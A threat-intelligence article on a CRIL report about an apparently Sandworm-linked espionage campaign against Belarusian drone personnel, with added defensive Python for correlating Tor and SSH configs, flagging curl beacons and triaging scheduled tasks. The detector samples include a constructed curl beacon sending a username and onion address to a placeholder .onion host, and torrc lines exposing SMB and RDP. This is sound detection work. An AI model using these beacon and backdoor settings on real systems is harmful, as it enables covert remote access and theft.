Researchers at Cyble Research and Intelligence Labs (CRIL) have identified a sophisticated malware campaign that leverages weaponized ZIP archives disguised as military training documents to infiltrate systems belonging to Belarusian Special Operations Command personnel specializing in UAV and drone operations.
The report, released in October 2025, reveals that the attackers employed advanced anti-analysis methods, Tor-hidden communication infrastructure, and OpenSSH for Windows to establish persistent, anonymous remote access to compromised hosts.
“The attack utilized a Belarusian military lure document targeting Special Operations Command personnel specializing in UAV/Drone operations, suggesting intelligence collection operations focused on regional military capabilities,” CRIL stated.
The infection begins with a ZIP archive titled “ТЛГ на убытие на переподготовку.pdf” (“TLG for departure for retraining”), which appears to be an official Belarusian military document. The file inside uses a double-extension technique — a common deception tactic — to appear as a PDF while actually being a malicious Windows LNK shortcut.
Upon execution, the LNK file triggers obfuscated PowerShell commands, which extract hidden archives containing additional payloads and configuration files. CRIL explains that “this multi-stage attack employs advanced evasion techniques, including double file extensions, anti-sandbox checks, and obfuscated PowerShell execution, to establish persistent backdoor access on targeted systems.”

The PowerShell scripts validate system conditions before continuing, checking whether the system has at least ten shortcut files and over 50 running processes. These checks ensure the malware only executes on genuine workstations, terminating itself in sandboxed or virtual analysis environments.
While the malicious payloads run in the background, the victim is shown a decoy PDF document to maintain legitimacy. This decoy contains instructions for military retraining and UAV flight procedures, aligning with the operation’s thematic focus on drone warfare.
“The decoy PDF reveals a specific targeting strategy focused on the Belarusian military sector,” CRIL reported. “The document’s potential targets are likely personnel within the Special Operations Command of the Belarusian Air Force who possess operational expertise in unmanned aerial vehicle (UAV) or drone operations.”
After the decoy opens, the malware installs a scheduled task that ensures persistence, executing on system logon and daily at 10:21 AM UTC. Two distinct tasks are then initiated:
Task 1 – OpenSSH Deployment
The malware launches a Microsoft-signed OpenSSH binary (githubdesktop.exe) configured to listen on localhost port 20321. The configuration allows only RSA key-based authentication, preventing password-based access and restricting logins to pre-generated keys embedded within the archive.
“Despite its benign filename suggesting legitimate software, githubdesktop.exe is actually the OpenSSH for Windows binary, digitally signed by Microsoft to evade security detection,” CRIL confirmed.
Through this SSH configuration, the attackers can execute remote commands, upload and download files via SFTP, and explore network shares through SMB — all while maintaining stealth.
Task 2 – Tor Network with Obfs4 Bridge
The malware deploys a customized Tor executable (pinterest.exe) that creates a hidden service (.onion address) to route all communication through the Tor network. It exposes multiple services over this anonymized channel:
- Port 20322 → SSH
- Port 11435 → SMB
- Port 13893 → RDP
- Ports 12192 / 14763 → custom backdoors
A critical improvement over earlier campaigns is the inclusion of obfs4 pluggable transport, which disguises Tor traffic as regular web activity.
“The implementation of advanced pluggable transport effectively hides Tor traffic as normal network activity, making detection significantly more challenging,” CRIL noted.
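The OpenSSH listener and the Tor hidden service described above are both driven by plain-text configuration files, so a responder who finds the renamed binaries can read their configs directly. The following Python is an added example (not code from the CRIL report or from the malware): it parses a constructed sshd_config and torrc in the formats the real OpenSSH and Tor use, and correlates the HiddenServicePort forwarding rules with the local listeners they reach. The onion-side and SSH port numbers are the ones reported above; the paths, the bridge address, the fingerprint and the certificate value are placeholders.

```python
"""Correlate an OpenSSH sshd_config with a Tor torrc to see which local
services a hidden service exposes.  Added example, not code from CRIL or
from the malware; both config texts below are constructed for the demo."""
import re

# Constructed sshd_config resembling the reported key-only localhost listener.
# The AuthorizedKeysFile path is a placeholder.
SSHD_CONFIG = """\
# sample sshd_config (constructed)
Port 20321
ListenAddress 127.0.0.1
PasswordAuthentication no
PubkeyAuthentication yes
AuthorizedKeysFile C:/Users/Public/cache/authorized_keys
Subsystem sftp sftp-server.exe
"""

# Constructed torrc resembling the reported hidden service with an obfs4 bridge.
# Onion-side ports are the reported ones; bridge address, fingerprint and cert
# are placeholders.
TORRC = """\
# sample torrc (constructed)
SocksPort 9050
HiddenServiceDir C:/Users/Public/cache/hs
HiddenServicePort 20322 127.0.0.1:20321
HiddenServicePort 11435 127.0.0.1:445
HiddenServicePort 13893 127.0.0.1:3389
HiddenServicePort 12192 127.0.0.1:12192
HiddenServicePort 14763 127.0.0.1:14763
UseBridges 1
ClientTransportPlugin obfs4 exec obfs4proxy.exe
Bridge obfs4 203.0.113.10:443 0000000000000000000000000000000000000000 cert=PLACEHOLDER iat-mode=0
"""

# Local ports whose exposure over Tor has no legitimate reason on a workstation.
WELL_KNOWN = {22: "SSH", 445: "SMB", 3389: "RDP"}


def parse_directives(text):
    """Return (keyword, value) pairs.  Both formats are 'Keyword value' per
    line with '#' comments, so one tokenizer serves both."""
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        pairs.append((parts[0], parts[1].strip() if len(parts) > 1 else ""))
    return pairs


def ssh_listener(sshd_text):
    """Where sshd listens and whether only key authentication is accepted.
    Like sshd itself, the first occurrence of a keyword wins."""
    d = {}
    for k, v in parse_directives(sshd_text):
        d.setdefault(k.lower(), v)
    return {
        "port": int(d.get("port", 22)),
        "address": d.get("listenaddress", "0.0.0.0"),
        "key_only": d.get("passwordauthentication", "yes").lower() == "no"
        and d.get("pubkeyauthentication", "yes").lower() == "yes",
    }


def hidden_service_map(torrc_text):
    """Map onion-side port -> (host, local port); also note an obfs4 transport."""
    mapping, uses_obfs4 = {}, False
    for k, v in parse_directives(torrc_text):
        if k == "HiddenServicePort":
            m = re.fullmatch(r"(\d+)\s+([\w.\-]+):(\d+)", v)
            if m:
                mapping[int(m.group(1))] = (m.group(2), int(m.group(3)))
        elif k == "ClientTransportPlugin" and v.split()[:1] == ["obfs4"]:
            uses_obfs4 = True
    return mapping, uses_obfs4


def correlate(sshd_text, torrc_text):
    """Label each exposed onion port with the local service it reaches."""
    ssh = ssh_listener(sshd_text)
    mapping, uses_obfs4 = hidden_service_map(torrc_text)
    services = {}
    for onion_port, (host, local_port) in sorted(mapping.items()):
        if local_port == ssh["port"]:
            services[onion_port] = "SSH (key-only)" if ssh["key_only"] else "SSH"
        else:
            services[onion_port] = WELL_KNOWN.get(local_port, "unknown/custom")
    return {"ssh_listener": ssh, "services": services, "obfs4": uses_obfs4}


if __name__ == "__main__":
    for onion_port, label in correlate(SSHD_CONFIG, TORRC)["services"].items():
        print(f"onion:{onion_port} -> {label}")
```

Run against the real files dropped beside the renamed binaries, a HiddenServicePort that forwards to 445 or 3389 on 127.0.0.1 is by itself a strong indicator: Tor has no reason to expose SMB or RDP, and a key-only sshd bound to localhost that is reachable only through an onion port is exactly the reported arrangement. The obfs4 flag matters for network detection: once a ClientTransportPlugin is configured, the host's outbound traffic will not look like ordinary Tor, so host-side evidence such as this becomes the more reliable signal.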
Once the backdoor is active, the malware constructs a unique .onion URL identifying each compromised host and sends this information to the attacker via a curl command routed through the local Tor SOCKS5 proxy.
The transmitted data includes the victim’s username, the generated Tor hidden service address, and a campaign identifier.
“The curl command is configured with aggressive retry logic — 1000 attempts with 3-second delays — to ensure reliable delivery even under adverse network conditions,” CRIL detailed.
Upon successful registration, the attacker gains comprehensive remote control, with the ability to access the victim system through SSH, RDP, SMB, or SFTP.
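The registration beacon leaves a distinctive process-creation record: a curl run through the local Tor SOCKS5 port, towards a .onion address, with retry counts no legitimate update check would use. The following Python is an added example, not CRIL's code: it scores curl command lines of the kind found in a process-creation log's CommandLine field. The three sample lines are constructed; the .onion names, the campaign identifier and the file paths are placeholders, and the retry values are the ones the report quotes.

```python
"""Flag curl invocations that look like the reported Tor-proxied registration
beacon.  Added example (not CRIL's code); the command lines below are
constructed in the shape of a process-creation log's CommandLine field, and
the .onion names and campaign id are placeholders."""
import re

SAMPLE_CMDLINES = [
    # constructed: local SOCKS proxy + .onion destination + 1000 retries / 3 s
    r'C:\Users\Public\cache\curl.exe --socks5-hostname 127.0.0.1:9050 --retry 1000 '
    r'--retry-delay 3 -d "user=alice&hs=PLACEHOLDERHS.onion&id=CAMPAIGN-PLACEHOLDER" '
    r'http://PLACEHOLDER-REGISTRATION.onion/register',
    # constructed: ordinary update check, nothing to flag
    r'curl.exe -sS https://example.com/update.json',
    # constructed: Tor proxy but a clearnet site and modest retries
    r'curl.exe --proxy socks5h://127.0.0.1:9150 --retry 5 https://check.torproject.org/',
]

# A proxy value pointing at a SOCKS port on the local host (Tor's default
# SocksPort is 9050; Tor Browser uses 9150).
LOCAL_SOCKS = re.compile(r"^(socks5h?://)?(127\.0\.0\.1|localhost):\d+/?$", re.I)
PROXY_FLAGS = {"-x", "--proxy", "--socks5", "--socks5-hostname"}
# Options that consume the following token, so it is not mistaken for the URL.
VALUE_FLAGS = {"-d", "--data", "-H", "--header", "-o", "--output", "-A", "--user-agent"}
RETRY_THRESHOLD = 100


def analyze_cmdline(line):
    """Extract proxy, destination and retry settings from one curl command
    line and explain why (or whether) it looks like the beacon."""
    tokens = line.split()
    proxy, dest, retry, delay = None, None, 0, 0
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if tok in PROXY_FLAGS:
            proxy, i = nxt, i + 2
        elif tok == "--retry":
            retry, i = (int(nxt) if nxt.isdigit() else 0), i + 2
        elif tok == "--retry-delay":
            delay, i = (int(nxt) if nxt.isdigit() else 0), i + 2
        elif tok in VALUE_FLAGS:
            i += 2
        else:
            if "://" in tok or tok.lower().endswith(".onion"):
                dest = tok
            i += 1

    local_socks = bool(proxy and LOCAL_SOCKS.match(proxy))
    reasons = []
    if local_socks:
        reasons.append("proxied through local SOCKS port")
    if dest and ".onion" in dest.lower():
        reasons.append(".onion destination")
    if retry >= RETRY_THRESHOLD:
        reasons.append(f"aggressive retry ({retry} attempts, {delay}s delay)")
    # Tor use alone is not malicious; flag only when it is combined with an
    # onion destination or beacon-style retry behaviour.
    flagged = local_socks and len(reasons) > 1
    return {"proxy": proxy, "dest": dest, "retry": retry, "retry_delay": delay,
            "reasons": reasons, "flagged": flagged}


def scan(cmdlines):
    """Return only the command lines that were flagged, with their reasons."""
    return [(line, analyze_cmdline(line)["reasons"])
            for line in cmdlines if analyze_cmdline(line)["flagged"]]


if __name__ == "__main__":
    for line, reasons in scan(SAMPLE_CMDLINES):
        print(line, "->", "; ".join(reasons))
```

The third sample is deliberately not flagged: a user reaching a clearnet site through Tor Browser's SOCKS port is unusual on a military workstation but is not the registration beacon, and treating every local-SOCKS curl as malicious would bury the real hit. The combination the report describes (local SOCKS proxy, .onion target, 1000 retries at 3-second spacing) is what the scoring keys on.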
Cyble analysts identified strong overlaps between this October 2025 sample and the December 2024 “Army+” campaign attributed to Sandworm (APT44 / UAC-0125) — a notorious Russian state-sponsored threat group linked to GRU Unit 74455.
“CRIL assesses with moderate confidence that this October 2025 sample has similarities with the December 2024 Army+ campaign attributed to UAC-0125/Sandworm (APT44),” the report stated.
Sandworm has a long history of high-profile operations, including the BlackEnergy power grid attacks (2015), NotPetya (2017), and the Kyivstar telecom breach (2023).
The current campaign shows technical improvements over previous Sandworm tactics:
- Use of obfs4 bridges for improved anonymity
- Pre-generated RSA keys for faster deployment and smaller forensic footprints
- Automated persistence through scheduled tasks
“These updates demonstrate the TA’s adaptability and commitment to enhancing operational security in response to evolving detection capabilities,” CRIL added.
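The scheduled-task persistence described earlier (a logon trigger plus a daily 10:21 UTC trigger, launching the renamed OpenSSH and Tor binaries) can be checked from exported task definitions. The following Python is an added example, not code from CRIL: it triages tasks in the XML format Windows itself uses (the output of `schtasks /Query /XML`, or the files under C:\Windows\System32\Tasks) and reports why a task deserves a closer look. Both task definitions are constructed; the file paths and command-line arguments are placeholders, and the benign vendor task is included only for contrast.

```python
r"""Triage Windows scheduled-task XML for the reported persistence pattern.
Added example, not CRIL's code.  Both tasks below are constructed; paths and
arguments are placeholders."""
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Folders an unprivileged user can write to; a task launching from one of
# these is worth a look regardless of the binary's name or signature.
USER_WRITABLE_HINTS = ("\\users\\public\\", "\\appdata\\", "\\temp\\",
                       "\\programdata\\", "\\downloads\\")

# Constructed: logon + daily 10:21 UTC triggers, two renamed binaries.
SUSPICIOUS_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
    <CalendarTrigger>
      <StartBoundary>2025-10-01T10:21:00Z</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\Public\cache\githubdesktop.exe</Command>
      <Arguments>-f sshd_config</Arguments>
    </Exec>
    <Exec>
      <Command>C:\Users\Public\cache\pinterest.exe</Command>
      <Arguments>-f torrc</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed: an ordinary daily updater from Program Files, for contrast.
BENIGN_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2025-01-01T03:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\Program Files\ExampleVendor\updater.exe</Command></Exec>
  </Actions>
</Task>"""


def triage_task(xml_text):
    """Summarise triggers and actions of one task and list review reasons."""
    root = ET.fromstring(xml_text)
    triggers = root.find("t:Triggers", NS)
    has_logon = triggers is not None and triggers.find("t:LogonTrigger", NS) is not None

    daily_time = None  # HH:MM of the first daily calendar trigger, if any
    if triggers is not None:
        for cal in triggers.findall("t:CalendarTrigger", NS):
            if cal.find("t:ScheduleByDay", NS) is not None:
                start = cal.findtext("t:StartBoundary", default="", namespaces=NS)
                if "T" in start:
                    daily_time = start.split("T", 1)[1][:5]

    actions = [(ex.findtext("t:Command", default="", namespaces=NS),
                ex.findtext("t:Arguments", default="", namespaces=NS))
               for ex in root.findall("t:Actions/t:Exec", NS)]

    reasons = []
    if has_logon and daily_time:
        reasons.append("logon trigger combined with a daily trigger")
    if any(any(h in cmd.lower() for h in USER_WRITABLE_HINTS) for cmd, _ in actions):
        reasons.append("executes a binary from a user-writable folder")
    return {"logon": has_logon, "daily_time": daily_time,
            "actions": actions, "reasons": reasons}


if __name__ == "__main__":
    for name, xml_text in (("suspicious", SUSPICIOUS_TASK), ("benign", BENIGN_TASK)):
        result = triage_task(xml_text)
        print(name, result["daily_time"], result["reasons"])
```

The triage does not try to decide whether githubdesktop.exe is really OpenSSH; that is answered by hashing the file and comparing it with the genuine OpenSSH for Windows release, which the Microsoft signature alone will not tell you, since the signature is valid. What the task XML does give cheaply is the trigger combination and the launch path, and on a managed workstation a signed binary running from C:\Users\Public on every logon is reason enough to pull the file.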
Although no secondary payloads were observed during testing, Cyble’s team successfully connected to a test instance of the malware via SSH to verify its backdoor functionality. This suggests that the operation is likely in its reconnaissance or pre-exploitation phase.
“The backdoor was tested by establishing a controlled SSH connection… The connection provided full command-line access through the Tor-anonymized channel, confirming the backdoor’s operational functionality,” the researchers explained.
Given the military-themed lure and regional focus, Cyble assesses that the operation is part of ongoing espionage targeting Eastern European defense sectors, possibly aimed at UAV and communications intelligence gathering.